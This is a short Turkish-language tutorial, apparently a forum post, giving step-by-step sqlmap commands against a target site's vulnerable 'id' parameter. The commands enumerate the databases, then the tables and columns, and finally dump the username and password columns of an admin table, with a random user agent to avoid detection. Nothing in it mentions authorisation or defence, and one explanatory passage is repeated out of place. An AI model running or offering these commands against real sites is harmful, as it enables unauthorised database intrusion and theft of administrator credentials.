Hedef Sitenin Database Adlarını Öğrenme

Hedef Sitemizin Database Adlarımızı Öğrenmemiz için;

sqlmap.py -u "xx.com/haber.php?id=4" --random-agent --dbs
(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

Çıktı;

[*] information_schema
[*] ip_whiz

Biz Buradan ip_whiz Databasesini Almamız Gerekiyor.

Hedef Sitenin Tablolarını Öğrenme

Hedef Sitemizin Database Tablolarını Öğrenmemiz için;

sqlmap.py -u "xx.com/haber.php?id=4" --random-agent -D ip_whiz --tables
(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

Buradaki Değişiklik ise --tables Yerine -T kullanmamız çünkü artık Tablo Adlarımızı biliyoruz -T parametresini Kullanarak Tablo adımızı Yazıp onun Üzerinden işlem yapacağımızı Söylüyoruz.

Hedef Sitenin Kolonlarını Öğrenme

Hedef Sitemizin Databasesindeki Tablonun Kolonlarını Öğrenmemiz için;

sqlmap.py -u "xx.com/haber.php?id=4" --random-agent -D ip_whiz -T admin --columns
(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

Buradaki Değişiklik ise --tables Yerine -T kullanmamız Tablolarımızı Öğrendiğimize Göre Belirli Bir Tablo Üzerinden işlem Yapmamızı Sağlıyor.

Hedef Sitenin Değerlerini Dışarı Aktarma ve Görme (Dump)

Hedef Sitemizin Datbasesinin Tablosundaki kolonların Değerlerini Görmeyi/Dump Etmemiz için;

sqlmap.py -u "xx.com/haber.php?id=4" --random-agent -D ip_whiz -T admin -C username,password --dump
(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

Buradaki Değişiklik ise --columns Yerine -C yazarak Kolon İsimlerini Belirtiyoruz böylece Tüm kolonları Değil Sadece bizim için işe yarayacak Kolonları Dışarı Aktarmış/Görmüş Oluyoruz.